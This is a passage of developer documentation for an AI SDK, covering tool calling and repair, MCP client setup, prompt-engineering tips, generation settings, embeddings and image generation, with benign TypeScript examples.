type: 'data-tool-status',
id: toolCallId,
data: {
name: 'myTool',
status: 'in-progress',
},
});
// ...
},
}),
},
});
writer.merge(result.toUIMessageStream());
},
});
return createUIMessageStreamResponse({ stream });
}
Messages
The messages that were sent to the language model to initiate the response that contained the tool call are forwarded to the tool execution.
You can access them in the second parameter of the execute function.
In multi-step calls, the messages contain the text, tool calls, and tool results from all previous steps.
import { generateText, tool } from 'ai';
const result = await generateText({
// ...
tools: {
myTool: tool({
// ...
execute: async (args, { messages }) => {
// use the message history in e.g. calls to other language models
return { ... };
},
}),
},
});
Abort Signals
The abort signals from generateText and streamText are forwarded to the tool execution.
You can access them in the second parameter of the execute function and e.g. abort long-running computations or forward them to fetch calls inside tools.
import { z } from 'zod';
import { generateText, tool } from 'ai';
__PROVIDER_IMPORT__;
const result = await generateText({
model: __MODEL__,
abortSignal: myAbortSignal, // signal that will be forwarded to tools
tools: {
weather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({ location: z.string() }),
execute: async ({ location }, { abortSignal }) => {
return fetch(
`https://api.weatherapi.com/v1/current.json?q=${location}`,
{ signal: abortSignal }, // forward the abort signal to fetch
);
},
}),
},
prompt: 'What is the weather in San Francisco?',
});
Context (experimental)
You can pass in arbitrary context from generateText or streamText via the experimental_context setting.
This context is available in the experimental_context tool execution option.
const result = await generateText({
// ...
tools: {
someTool: tool({
// ...
execute: async (input, { experimental_context: context }) => {
const typedContext = context as { example: string }; // or use type validation library
// ...
},
}),
},
experimental_context: { example: '123' },
});
Tool Input Lifecycle Hooks
The following tool input lifecycle hooks are available:
- onInputStart: Called when the model starts generating the input (arguments) for the tool call.
- onInputDelta: Called for each chunk of text as the input is streamed.
- onInputAvailable: Called when the complete input is available and validated.
onInputStart and onInputDelta are only called in streaming contexts (when using streamText). They are not called when using generateText.
Example
import { streamText, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const result = streamText({
model: __MODEL__,
tools: {
getWeather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
onInputStart: () => {
console.log('Tool call starting');
},
onInputDelta: ({ inputTextDelta }) => {
console.log('Received input chunk:', inputTextDelta);
},
onInputAvailable: ({ input }) => {
console.log('Complete input:', input);
},
}),
},
prompt: 'What is the weather in San Francisco?',
});
Types
Modularizing your code often requires defining types to ensure type safety and reusability. To enable this, the AI SDK provides several helper types for tools, tool calls, and tool results.
You can use them to strongly type your variables, function parameters, and return types
in parts of the code that are not directly related to streamText or generateText.
Each tool call is typed with ToolCall<NAME extends string, ARGS>, depending
on the tool that has been invoked.
Similarly, the tool results are typed with ToolResult<NAME extends string, ARGS, RESULT>.
The tools in streamText and generateText are defined as a ToolSet.
The type inference helpers TypedToolCall<TOOLS extends ToolSet>
and TypedToolResult<TOOLS extends ToolSet> can be used to
extract the tool call and tool result types from the tools.
import { TypedToolCall, TypedToolResult, generateText, tool } from 'ai';
__PROVIDER_IMPORT__;
import { z } from 'zod';
const myToolSet = {
firstTool: tool({
description: 'Greets the user',
inputSchema: z.object({ name: z.string() }),
execute: async ({ name }) => `Hello, ${name}!`,
}),
secondTool: tool({
description: 'Tells the user their age',
inputSchema: z.object({ age: z.number() }),
execute: async ({ age }) => `You are ${age} years old!`,
}),
};
type MyToolCall = TypedToolCall<typeof myToolSet>;
type MyToolResult = TypedToolResult<typeof myToolSet>;
async function generateSomething(prompt: string): Promise<{
text: string;
toolCalls: Array<MyToolCall>; // typed tool calls
toolResults: Array<MyToolResult>; // typed tool results
}> {
return generateText({
model: __MODEL__,
tools: myToolSet,
prompt,
});
}
Handling Errors
The AI SDK has three tool-call related errors:
- NoSuchToolError: the model tries to call a tool that is not defined in the tools object
- InvalidToolInputError: the model calls a tool with inputs that do not match the tool's input schema
- ToolCallRepairError: an error that occurred during tool call repair
When tool execution fails (errors thrown by your tool's execute function), the AI SDK adds them as tool-error content parts to enable automated LLM roundtrips in multi-step scenarios.
generateText
generateText throws errors for tool schema validation issues and other errors, and can be handled using a try/catch block. Tool execution errors appear as tool-error parts in the result steps:
try {
const result = await generateText({
//...
});
} catch (error) {
if (NoSuchToolError.isInstance(error)) {
// handle the no such tool error
} else if (InvalidToolInputError.isInstance(error)) {
// handle the invalid tool inputs error
} else {
// handle other errors
}
}
Tool execution errors are available in the result steps:
const { steps } = await generateText({
// ...
});
// check for tool errors in the steps
const toolErrors = steps.flatMap(step =>
step.content.filter(part => part.type === 'tool-error'),
);
toolErrors.forEach(toolError => {
console.log('Tool error:', toolError.error);
console.log('Tool name:', toolError.toolName);
console.log('Tool input:', toolError.input);
});
streamText
streamText sends errors as part of the full stream. Tool execution errors appear as tool-error parts, while other errors appear as error parts.
When using toUIMessageStreamResponse, you can pass an onError function to extract the error message from the error part and forward it as part of the stream response:
const result = streamText({
// ...
});
return result.toUIMessageStreamResponse({
onError: error => {
if (NoSuchToolError.isInstance(error)) {
return 'The model tried to call an unknown tool.';
} else if (InvalidToolInputError.isInstance(error)) {
return 'The model called a tool with invalid inputs.';
} else {
return 'An unknown error occurred.';
}
},
});
Tool Call Repair
Language models sometimes fail to generate valid tool calls, especially when the input schema is complex or the model is smaller.
If you use multiple steps, those failed tool calls will be sent back to the LLM in the next step to give it an opportunity to fix them. However, you may want to control how invalid tool calls are repaired without requiring additional steps that pollute the message history.
You can use the experimental_repairToolCall function to attempt to repair the tool call
with a custom function.
You can use different strategies to repair the tool call:
- Use a model with structured outputs to generate the inputs.
- Send the messages, system prompt, and tool schema to a stronger model to generate the inputs.
- Provide more specific repair instructions based on which tool was called.
Example: Use a model with structured outputs for repair
import { generateObject, generateText, NoSuchToolError } from 'ai';
__PROVIDER_IMPORT__;
const result = await generateText({
model: __MODEL__,
tools,
prompt,
experimental_repairToolCall: async ({
toolCall,
tools,
inputSchema,
error,
}) => {
if (NoSuchToolError.isInstance(error)) {
return null; // do not attempt to fix invalid tool names
}
const tool = tools[toolCall.toolName as keyof typeof tools];
const { object: repairedArgs } = await generateObject({
model: __MODEL__,
schema: tool.inputSchema,
prompt: [
`The model tried to call the tool "${toolCall.toolName}"` +
` with the following inputs:`,
JSON.stringify(toolCall.input),
`The tool accepts the following schema:`,
JSON.stringify(inputSchema(toolCall)),
'Please fix the inputs.',
].join('\n'),
});
return { ...toolCall, input: JSON.stringify(repairedArgs) };
},
});
Example: Use the re-ask strategy for repair
import { generateText } from 'ai';
__PROVIDER_IMPORT__;
const result = await generateText({
model: __MODEL__,
tools,
prompt,
experimental_repairToolCall: async ({
toolCall,
tools,
error,
messages,
system,
}) => {
const result = await generateText({
model: __MODEL__,
system,
messages: [
...messages,
{
role: 'assistant',
content: [
{
type: 'tool-call',
toolCallId: toolCall.toolCallId,
toolName: toolCall.toolName,
input: toolCall.input,
},
],
},
{
role: 'tool' as const,
content: [
{
type: 'tool-result',
toolCallId: toolCall.toolCallId,
toolName: toolCall.toolName,
output: error.message,
},
],
},
],
tools,
});
const newToolCall = result.toolCalls.find(
newToolCall => newToolCall.toolName === toolCall.toolName,
);
return newToolCall != null
? {
toolCallType: 'function' as const,
toolCallId: toolCall.toolCallId,
toolName: toolCall.toolName,
input: JSON.stringify(newToolCall.input),
}
: null;
},
});
Active Tools
Language models can only handle a limited number of tools at a time, depending on the model.
To keep static typing over a large set of tools while limiting which tools are available to the model, the AI SDK provides the activeTools property.
It is an array of the tool names that are currently active.
By default, the value is undefined and all tools are active.
import { generateText } from 'ai';
__PROVIDER_IMPORT__;
const { text } = await generateText({
model: __MODEL__,
tools: myToolSet,
activeTools: ['firstTool'],
prompt: 'Greet the user named Alice.',
});
Multi-modal Tool Results
For Google, use base64 media parts (image-data / file-data) or base64
data: URLs in URL-style parts. Remote HTTP(S) URLs in tool-result URL parts
are not supported.
In order to send multi-modal tool results, e.g. screenshots, back to the model, they need to be converted into a specific format.
AI SDK Core tools have an optional toModelOutput function
that converts the tool result into a content part.
Here is an example for converting a screenshot into a content part:
import { generateText } from 'ai';
import { anthropic } from '@ai-sdk/anthropic';
import fs from 'node:fs';
const result = await generateText({
model: __MODEL__,
tools: {
computer: anthropic.tools.computer_20241022({
// ...
async execute({ action, coordinate, text }) {
switch (action) {
case 'screenshot': {
return {
type: 'image',
data: fs
.readFileSync('./data/screenshot-editor.png')
.toString('base64'),
};
}
default: {
return `executed ${action}`;
}
}
},
// map to tool result content for LLM consumption:
toModelOutput(result) {
return {
type: 'content',
value:
typeof result === 'string'
? [{ type: 'text', text: result }]
: [{ type: 'media', data: result.data, mediaType: 'image/png' }],
};
},
}),
},
// ...
});
Extracting Tools
Once you start having many tools, you might want to extract them into separate files.
The tool helper function is crucial for this, because it ensures correct type inference.
Here is an example of an extracted tool:
import { tool } from 'ai';
import { z } from 'zod';
// the `tool` helper function ensures correct type inference:
export const weatherTool = tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string().describe('The location to get the weather for'),
}),
execute: async ({ location }) => ({
location,
temperature: 72 + Math.floor(Math.random() * 21) - 10,
}),
});
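The extracted tool can then be imported and used like any inline tool. A minimal sketch (the file path is illustrative):
import { generateText } from 'ai';
import { weatherTool } from './tools/weather-tool'; // illustrative path
const { text } = await generateText({
model: __MODEL__,
tools: { weather: weatherTool },
prompt: 'What is the weather in San Francisco?',
});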
MCP Tools
The AI SDK supports connecting to Model Context Protocol (MCP) servers to access their tools. MCP enables your AI applications to discover and use tools across various services through a standardized interface.
For detailed information about MCP tools, including initialization, transport options, and usage patterns, see the MCP Tools documentation.
AI SDK Tools vs MCP Tools
In most cases, you should define your own AI SDK tools for production applications. They provide full control, type safety, and optimal performance. MCP tools are best suited for rapid development iteration and scenarios where users bring their own tools.
| Aspect | AI SDK Tools | MCP Tools |
|---|---|---|
| Type Safety | Full static typing end-to-end | Dynamic discovery at runtime |
| Execution | Same process as your request (low latency) | Separate server (network overhead) |
| Prompt Control | Full control over descriptions and schemas | Controlled by MCP server owner |
| Schema Control | You define and optimize for your model | Controlled by MCP server owner |
| Version Management | Full visibility over updates | Can update independently (version skew risk) |
| Authentication | Same process, no additional auth required | Separate server introduces additional auth complexity |
| Best For | Production applications requiring control and performance | Development iteration, user-provided tools |
Examples
You can see tools in action using various frameworks in the following examples:
<ExampleLinks examples={[ { title: 'Learn to use tools in Node.js', link: '/cookbook/node/call-tools', }, { title: 'Learn to use tools in Next.js with Route Handlers', link: '/cookbook/next/call-tools', }, { title: 'Learn to use MCP tools in Node.js', link: '/cookbook/node/mcp-tools', }, ]} />
title: Model Context Protocol (MCP) description: Learn how to connect to Model Context Protocol (MCP) servers and use their tools with AI SDK Core.
Model Context Protocol (MCP)
The AI SDK supports connecting to Model Context Protocol (MCP) servers to access their tools, resources, and prompts. This enables your AI applications to discover and use capabilities across various services through a standardized interface.
Initializing an MCP Client
We recommend using HTTP transport (like StreamableHTTPClientTransport) for production deployments. The stdio transport should only be used for connecting to local servers as it cannot be deployed to production environments.
Create an MCP client using one of the following transport options:
- HTTP transport (Recommended): Configure HTTP directly on the client via transport: { type: 'http', ... }, or use StreamableHTTPClientTransport from MCP's official TypeScript SDK
- SSE (Server-Sent Events): An alternative HTTP-based transport
- stdio: For local development only. Uses standard input/output streams for local MCP servers
HTTP Transport (Recommended)
For production deployments, we recommend using the HTTP transport. You can configure it directly on the client:
import { experimental_createMCPClient as createMCPClient } from '@ai-sdk/mcp';
const mcpClient = await createMCPClient({
transport: {
type: 'http',
url: 'https://your-server.com/mcp',
// optional: configure HTTP headers
headers: { Authorization: 'Bearer my-api-key' },
// optional: provide an OAuth client provider for automatic authorization
authProvider: myOAuthClientProvider,
},
});
Alternatively, you can use StreamableHTTPClientTransport from MCP's official TypeScript SDK:
import { experimental_createMCPClient as createMCPClient } from '@ai-sdk/mcp';
import { StreamableHTTPClientTransport } from '@modelcontextprotocol/sdk/client/streamableHttp.js';
const url = new URL('https://your-server.com/mcp');
const mcpClient = await createMCPClient({
transport: new StreamableHTTPClientTransport(url, {
sessionId: 'session_123',
}),
});
SSE Transport
SSE provides an alternative HTTP-based transport option. Configure it with a type and url property. You can also provide an authProvider for OAuth:
import { experimental_createMCPClient as createMCPClient } from '@ai-sdk/mcp';
const mcpClient = await createMCPClient({
transport: {
type: 'sse',
url: 'https://my-server.com/sse',
// optional: configure HTTP headers
headers: { Authorization: 'Bearer my-api-key' },
// optional: provide an OAuth client provider for automatic authorization
authProvider: myOAuthClientProvider,
},
});
Stdio Transport (Local Servers)
The Stdio transport can be imported from either the MCP SDK or the AI SDK:
import { experimental_createMCPClient as createMCPClient } from '@ai-sdk/mcp';
import { StdioClientTransport } from '@modelcontextprotocol/sdk/client/stdio.js';
// Or use the AI SDK's stdio transport:
// import { Experimental_StdioMCPTransport as StdioClientTransport } from '@ai-sdk/mcp/mcp-stdio';
const mcpClient = await createMCPClient({
transport: new StdioClientTransport({
command: 'node',
args: ['src/stdio/dist/server.js'],
}),
});
Custom Transport
You can also bring your own transport by implementing the MCPTransport interface for specific requirements not covered by the standard transports.
Authorization via OAuth is supported when using the AI SDK MCP HTTP or SSE
transports by providing an authProvider.
Closing the MCP Client
After initialization, you should close the MCP client based on your usage pattern:
- For short-lived usage (e.g., single requests), close the client when the response is finished
- For long-running clients (e.g., command line apps), keep the client open but ensure it's closed when the application terminates
When streaming responses, you can close the client when the LLM response has finished. For example, when using streamText, you should use the onFinish callback:
const mcpClient = await experimental_createMCPClient({
// ...
});
const tools = await mcpClient.tools();
const result = await streamText({
model: __MODEL__,
tools,
prompt: 'What is the weather in Brooklyn, New York?',
onFinish: async () => {
await mcpClient.close();
},
});
When generating responses without streaming, you can use try/finally or cleanup functions in your framework:
let mcpClient: MCPClient | undefined;
try {
mcpClient = await experimental_createMCPClient({
// ...
});
} finally {
await mcpClient?.close();
}
Using MCP Tools
The client's tools method acts as an adapter between MCP tools and AI SDK tools. It supports two approaches for working with tool schemas:
Schema Discovery
With schema discovery, all tools offered by the server are automatically listed, and input parameter types are inferred based on the schemas provided by the server:
const tools = await mcpClient.tools();
This approach is simpler to implement and automatically stays in sync with server changes. However, you won't have TypeScript type safety during development, and all tools from the server will be loaded.
Schema Definition
For better type safety and control, you can define the tools and their input schemas explicitly in your client code:
import { z } from 'zod';
const tools = await mcpClient.tools({
schemas: {
'get-data': {
inputSchema: z.object({
query: z.string().describe('The data query'),
format: z.enum(['json', 'text']).optional(),
}),
},
// For tools with zero inputs, you should use an empty object:
'tool-with-no-args': {
inputSchema: z.object({}),
},
},
});
This approach provides full TypeScript type safety and IDE autocompletion, letting you catch parameter mismatches during development. When you define schemas, the client only pulls the explicitly defined tools, keeping your application focused on the tools it needs.
Using MCP Resources
According to the MCP specification, resources are application-driven data sources that provide context to the model. Unlike tools (which are model-controlled), your application decides when to fetch and pass resources as context.
The MCP client provides three methods for working with resources:
Listing Resources
List all available resources from the MCP server:
const resources = await mcpClient.listResources();
Reading Resource Contents
Read the contents of a specific resource by its URI:
const resourceData = await mcpClient.readResource({
uri: 'file:///example/document.txt',
});
Listing Resource Templates
Resource templates are dynamic URI patterns that allow flexible queries. List all available templates:
const templates = await mcpClient.listResourceTemplates();
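You can then expand a template's URI pattern yourself and read the resulting resource with readResource. A minimal sketch (the template pattern and expanded URI are hypothetical):
const templates = await mcpClient.listResourceTemplates();
// suppose one template exposes the pattern 'file:///logs/{date}.txt' (hypothetical)
const resourceData = await mcpClient.readResource({
uri: 'file:///logs/2024-01-01.txt', // expanded from the template
});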
Using MCP Prompts
According to the MCP specification, prompts are user-controlled templates that servers expose for clients to list and retrieve with optional arguments.
Listing Prompts
const prompts = await mcpClient.listPrompts();
Getting a Prompt
Retrieve prompt messages, optionally passing arguments defined by the server:
const prompt = await mcpClient.getPrompt({
name: 'code_review',
arguments: { code: 'function add(a, b) { return a + b; }' },
});
Handling Elicitation Requests
Elicitation is a mechanism where MCP servers can request additional information from the client during tool execution. For example, a server might need user input to complete a registration form or confirmation for a sensitive operation.
Enabling Elicitation Support
To enable elicitation, you need to advertise the capability when creating the MCP client:
const mcpClient = await experimental_createMCPClient({
transport: {
type: 'sse',
url: 'https://your-server.com/sse',
},
capabilities: {
elicitation: {},
},
});
Registering an Elicitation Handler
Use the onElicitationRequest method to register a handler that will be called when the server requests input:
import { ElicitationRequestSchema } from '@ai-sdk/mcp';
mcpClient.onElicitationRequest(ElicitationRequestSchema, async request => {
// request.params.message: A message describing what input is needed
// request.params.requestedSchema: JSON schema defining the expected input structure
// Get input from the user (implement according to your application's needs)
const userInput = await getInputFromUser(
request.params.message,
request.params.requestedSchema,
);
// Return the result with one of three actions:
return {
action: 'accept', // or 'decline' or 'cancel'
content: userInput, // only required when action is 'accept'
};
});
Elicitation Response Actions
Your handler must return an object with an action field that can be one of:
- 'accept': The user provided the requested information. Must include content with the data.
- 'decline': The user chose not to provide the information.
- 'cancel': The user cancelled the operation entirely.
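For example, a handler might decline when the user dismisses the input dialog. A minimal sketch (getOptionalInputFromUser is a hypothetical helper):
mcpClient.onElicitationRequest(ElicitationRequestSchema, async request => {
const userInput = await getOptionalInputFromUser(request.params); // hypothetical helper
if (userInput == null) {
return { action: 'decline' }; // no content needed when declining
}
return { action: 'accept', content: userInput };
});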
Examples
You can see MCP in action in the following examples:
<ExampleLinks examples={[ { title: 'Learn to use MCP tools in Node.js', link: '/cookbook/node/mcp-tools', }, { title: 'Learn to handle MCP elicitation requests in Node.js', link: '/cookbook/node/mcp-elicitation', }, ]} />
title: Prompt Engineering description: Learn how to develop prompts with AI SDK Core.
Prompt Engineering
Tips
Prompts for Tools
When you create prompts that include tools, getting good results can be tricky as the number and complexity of your tools increases.
Here are a few tips to help you get the best results:
- Use a model that is strong at tool calling, such as gpt-5 or gpt-4.1. Weaker models will often struggle to call tools effectively and flawlessly.
- Keep the number of tools low, e.g. to 5 or less.
- Keep the complexity of the tool parameters low. Complex Zod schemas with many nested and optional elements, unions, etc. can be challenging for the model to work with.
- Use semantically meaningful names for your tools, parameters, parameter properties, etc. The more information you pass to the model, the better it can understand what you want.
- Add .describe("...") to your Zod schema properties to give the model hints about what a particular property is for (see the sketch below).
- When the output of a tool might be unclear to the model and there are dependencies between tools, use the description field of a tool to provide information about the output of the tool execution.
- You can include example input/outputs of tool calls in your prompt to help the model understand how to use the tools. Keep in mind that the tools work with JSON objects, so the examples should use JSON.
In general, the goal should be to give the model all information it needs in a clear way.
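For example, a tool definition that applies these tips might look like the following sketch (the tool itself is illustrative):
import { tool } from 'ai';
import { z } from 'zod';
const createCalendarEvent = tool({
description:
'Create a calendar event. Returns the id of the created event, ' +
'which can be passed to other calendar tools.',
inputSchema: z.object({
title: z.string().describe('Short, human-readable event title'),
startTime: z
.string()
.describe('Start time in ISO 8601 format, e.g. "2024-01-01T10:00:00Z"'),
durationMinutes: z.number().describe('Duration of the event in minutes'),
}),
execute: async ({ title, startTime, durationMinutes }) => {
// illustrative implementation
return { eventId: 'evt_123', title, startTime, durationMinutes };
},
});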
Tool & Structured Data Schemas
The mapping from Zod schemas to LLM inputs (typically JSON schema) is not always straightforward, since the mapping is not one-to-one.
Zod Dates
Zod expects JavaScript Date objects, but models return dates as strings.
You can specify and validate the date format using z.string().datetime() or z.string().date(),
and then use a Zod transformer to convert the string to a Date object.
const result = await generateObject({
model: __MODEL__,
schema: z.object({
events: z.array(
z.object({
event: z.string(),
date: z
.string()
.date()
.transform(value => new Date(value)),
}),
),
}),
prompt: 'List 5 important events from the year 2000.',
});
Optional Parameters
When working with tools that have optional parameters, you may encounter compatibility issues with certain providers that use strict schema validation.
For maximum compatibility, optional parameters should use .nullable() instead of .optional():
// This may fail with strict schema validation
const failingTool = tool({
description: 'Execute a command',
inputSchema: z.object({
command: z.string(),
workdir: z.string().optional(), // This can cause errors
timeout: z.string().optional(),
}),
});
// This works with strict schema validation
const workingTool = tool({
description: 'Execute a command',
inputSchema: z.object({
command: z.string(),
workdir: z.string().nullable(), // Use nullable instead
timeout: z.string().nullable(),
}),
});
Temperature Settings
For tool calls and object generation, it's recommended to use temperature: 0 to ensure deterministic and consistent results:
const result = await generateText({
model: __MODEL__,
temperature: 0, // Recommended for tool calls
tools: {
myTool: tool({
description: 'Execute a command',
inputSchema: z.object({
command: z.string(),
}),
}),
},
prompt: 'Execute the ls command',
});
Lower temperature values reduce randomness in model outputs, which is particularly important when the model needs to:
- Generate structured data with specific formats
- Make precise tool calls with correct parameters
- Follow strict schemas consistently
Debugging
Inspecting Warnings
Not all providers support all AI SDK features. Providers either throw exceptions or return warnings when they do not support a feature. To check if your prompt, tools, and settings are handled correctly by the provider, you can check the call warnings:
const result = await generateText({
model: __MODEL__,
prompt: 'Hello, world!',
});
console.log(result.warnings);
HTTP Request Bodies
You can inspect the raw HTTP request bodies for models that expose them, e.g. OpenAI. This allows you to inspect the exact payload that is sent to the model provider in the provider-specific format.
Request bodies are available via the request.body property of the response:
const result = await generateText({
model: __MODEL__,
prompt: 'Hello, world!',
});
console.log(result.request.body);
title: Settings description: Learn how to configure the AI SDK.
Settings
Large language models (LLMs) typically provide settings to augment their output.
All AI SDK functions support the following common settings in addition to the model, the prompt, and additional provider-specific settings:
const result = await generateText({
model: __MODEL__,
maxOutputTokens: 512,
temperature: 0.3,
maxRetries: 5,
prompt: 'Invent a new holiday and describe its traditions.',
});
maxOutputTokens
Maximum number of tokens to generate.
temperature
Temperature setting.
The value is passed through to the provider. The range depends on the provider and model.
For most providers, 0 means almost deterministic results, and higher values mean more randomness.
It is recommended to set either temperature or topP, but not both.
In AI SDK 5.0, temperature is no longer set to 0 by default.
topP
Nucleus sampling.
The value is passed through to the provider. The range depends on the provider and model. For most providers, nucleus sampling is a number between 0 and 1. E.g. 0.1 would mean that only tokens with the top 10% probability mass are considered.
It is recommended to set either temperature or topP, but not both.
topK
Only sample from the top K options for each subsequent token.
Used to remove "long tail" low probability responses.
Recommended for advanced use cases only. You usually only need to use temperature.
presencePenalty
The presence penalty affects the likelihood of the model to repeat information that is already in the prompt.
The value is passed through to the provider. The range depends on the provider and model.
For most providers, 0 means no penalty.
frequencyPenalty
The frequency penalty affects the likelihood of the model to repeatedly use the same words or phrases.
The value is passed through to the provider. The range depends on the provider and model.
For most providers, 0 means no penalty.
stopSequences
The stop sequences to use for stopping the text generation.
If set, the model will stop generating text when one of the stop sequences is generated. Providers may have limits on the number of stop sequences.
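A minimal sketch (the stop sequence is illustrative):
const result = await generateText({
model: __MODEL__,
prompt: 'Write a haiku about the ocean, then explain it.',
stopSequences: ['\n\n'], // stop at the first blank line
});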
seed
The seed (integer) to use for random sampling. If set and supported by the model, calls will generate deterministic results.
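For example, a fixed seed can be combined with temperature: 0 for reproducible outputs on models that support seeding (a minimal sketch):
const result = await generateText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
seed: 42,
temperature: 0,
});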
maxRetries
Maximum number of retries. Set to 0 to disable retries. Default: 2.
abortSignal
An optional abort signal that can be used to cancel the call.
The abort signal can e.g. be forwarded from a user interface to cancel the call, or to define a timeout.
Example: Timeout
const result = await generateText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
abortSignal: AbortSignal.timeout(5000), // 5 seconds
});
headers
Additional HTTP headers to be sent with the request. Only applicable for HTTP-based providers.
You can use the request headers to provide additional information to the provider,
depending on what the provider supports. For example, some observability providers support
headers such as Prompt-Id.
import { generateText } from 'ai';
__PROVIDER_IMPORT__;
const result = await generateText({
model: __MODEL__,
prompt: 'Invent a new holiday and describe its traditions.',
headers: {
'Prompt-Id': 'my-prompt-id',
},
});
title: Embeddings description: Learn how to embed values with the AI SDK.
Embeddings
Embeddings are a way to represent words, phrases, or images as vectors in a high-dimensional space. In this space, similar words are close to each other, and the distance between words can be used to measure their similarity.
Embedding a Single Value
The AI SDK provides the embed function to embed single values, which is useful for tasks such as finding similar words
or phrases or clustering text.
You can use it with embeddings models, e.g. openai.textEmbeddingModel('text-embedding-3-large') or mistral.textEmbeddingModel('mistral-embed').
import { embed } from 'ai';
import { openai } from '@ai-sdk/openai';
// 'embedding' is a single embedding object (number[])
const { embedding } = await embed({
model: 'openai/text-embedding-3-small',
value: 'sunny day at the beach',
});
Embedding Many Values
When loading data, e.g. when preparing a data store for retrieval-augmented generation (RAG), it is often useful to embed many values at once (batch embedding).
The AI SDK provides the embedMany function for this purpose.
Similar to embed, you can use it with embeddings models,
e.g. openai.textEmbeddingModel('text-embedding-3-large') or mistral.textEmbeddingModel('mistral-embed').
import { openai } from '@ai-sdk/openai';
import { embedMany } from 'ai';
// 'embeddings' is an array of embedding objects (number[][]).
// It is sorted in the same order as the input values.
const { embeddings } = await embedMany({
model: 'openai/text-embedding-3-small',
values: [
'sunny day at the beach',
'rainy afternoon in the city',
'snowy night in the mountains',
],
});
Embedding Similarity
After embedding values, you can calculate the similarity between them using the cosineSimilarity function.
This is useful to e.g. find similar words or phrases in a dataset.
You can also rank and filter related items based on their similarity.
import { openai } from '@ai-sdk/openai';
import { cosineSimilarity, embedMany } from 'ai';
const { embeddings } = await embedMany({
model: 'openai/text-embedding-3-small',
values: ['sunny day at the beach', 'rainy afternoon in the city'],
});
console.log(
`cosine similarity: ${cosineSimilarity(embeddings[0], embeddings[1])}`,
);
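For example, you can rank a set of documents against a query by embedding the query with embed and sorting by cosine similarity. A minimal sketch:
import { cosineSimilarity, embed, embedMany } from 'ai';
const documents = [
'sunny day at the beach',
'rainy afternoon in the city',
'snowy night in the mountains',
];
const { embeddings } = await embedMany({
model: 'openai/text-embedding-3-small',
values: documents,
});
const { embedding: queryEmbedding } = await embed({
model: 'openai/text-embedding-3-small',
value: 'what to do in warm weather',
});
// rank documents by similarity to the query, highest first
const ranked = documents
.map((document, index) => ({
document,
similarity: cosineSimilarity(queryEmbedding, embeddings[index]),
}))
.sort((a, b) => b.similarity - a.similarity);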
Token Usage
Many providers charge based on the number of tokens used to generate embeddings.
Both embed and embedMany provide token usage information in the usage property of the result object:
import { openai } from '@ai-sdk/openai';
import { embed } from 'ai';
const { embedding, usage } = await embed({
model: 'openai/text-embedding-3-small',
value: 'sunny day at the beach',
});
console.log(usage); // { tokens: 10 }
Settings
Provider Options
Embedding model settings can be configured using providerOptions for provider-specific parameters:
import { openai } from '@ai-sdk/openai';
import { embed } from 'ai';
const { embedding } = await embed({
model: 'openai/text-embedding-3-small',
value: 'sunny day at the beach',
providerOptions: {
openai: {
dimensions: 512, // Reduce embedding dimensions
},
},
});
Parallel Requests
The embedMany function supports parallel processing with a configurable maxParallelCalls setting to optimize performance:
import { openai } from '@ai-sdk/openai';
import { embedMany } from 'ai';
const { embeddings, usage } = await embedMany({
maxParallelCalls: 2, // Limit parallel requests
model: 'openai/text-embedding-3-small',
values: [
'sunny day at the beach',
'rainy afternoon in the city',
'snowy night in the mountains',
],
});
Retries
Both embed and embedMany accept an optional maxRetries parameter of type number
that you can use to set the maximum number of retries for the embedding process.
It defaults to 2 retries (3 attempts in total). You can set it to 0 to disable retries.
import { openai } from '@ai-sdk/openai';
import { embed } from 'ai';
const { embedding } = await embed({
model: 'openai/text-embedding-3-small',
value: 'sunny day at the beach',
maxRetries: 0, // Disable retries
});
Abort Signals and Timeouts
Both embed and embedMany accept an optional abortSignal parameter of
type AbortSignal
that you can use to abort the embedding process or set a timeout.
import { openai } from '@ai-sdk/openai';
import { embed } from 'ai';
const { embedding } = await embed({
model: 'openai/text-embedding-3-small',
value: 'sunny day at the beach',
abortSignal: AbortSignal.timeout(1000), // Abort after 1 second
});
Custom Headers
Both embed and embedMany accept an optional headers parameter of type Record<string, string>
that you can use to add custom headers to the embedding request.
import { openai } from '@ai-sdk/openai';
import { embed } from 'ai';
const { embedding } = await embed({
model: 'openai/text-embedding-3-small',
value: 'sunny day at the beach',
headers: { 'X-Custom-Header': 'custom-value' },
});
Response Information
Both embed and embedMany return response information that includes the raw provider response:
import { openai } from '@ai-sdk/openai';
import { embed } from 'ai';
const { embedding, response } = await embed({
model: 'openai/text-embedding-3-small',
value: 'sunny day at the beach',
});
console.log(response); // Raw provider response
Embedding Providers & Models
Several providers offer embedding models:
| Provider | Model | Embedding Dimensions | Multimodal |
|---|---|---|---|
| OpenAI | text-embedding-3-large | 3072 | |
| OpenAI | text-embedding-3-small | 1536 | |
| OpenAI | text-embedding-ada-002 | 1536 | |
| Google Generative AI | gemini-embedding-001 | 3072 | |
| Google Generative AI | gemini-embedding-2-preview | 3072 | |
| Mistral | mistral-embed | 1024 | |
| Cohere | embed-english-v3.0 | 1024 | |
| Cohere | embed-multilingual-v3.0 | 1024 | |
| Cohere | embed-english-light-v3.0 | 384 | |
| Cohere | embed-multilingual-light-v3.0 | 384 | |
| Cohere | embed-english-v2.0 | 4096 | |
| Cohere | embed-english-light-v2.0 | 1024 | |
| Cohere | embed-multilingual-v2.0 | 768 | |
| Amazon Bedrock | amazon.titan-embed-text-v1 | 1536 | |
| Amazon Bedrock | amazon.titan-embed-text-v2:0 | 1024 | |
title: Image Generation description: Learn how to generate images with the AI SDK.
Image Generation
Image generation is an experimental feature.
The AI SDK provides the generateImage
function to generate images based on a given prompt using an image model.
import { experimental_generateImage as generateImage } from 'ai';
import { openai } from '@ai-sdk/openai';
const { image } = await generateImage({
model: openai.image('dall-e-3'),
prompt: 'Santa Claus driving a Cadillac',
});
You can access the image data using the base64 or uint8Array properties:
const base64 = image.base64; // base64 image data
const uint8Array = image.uint8Array; // Uint8Array image data
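For example, you can write the binary data to a file (a minimal sketch):
import { writeFile } from 'node:fs/promises';
await writeFile('image.png', image.uint8Array);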
Settings
Size and Aspect Ratio
Depending on the model, you can either specify the size or the aspect ratio.
Size
The size is specified as a string in the format {width}x{height}.
Models only support a few sizes, and the supported sizes are different for each model and provider.
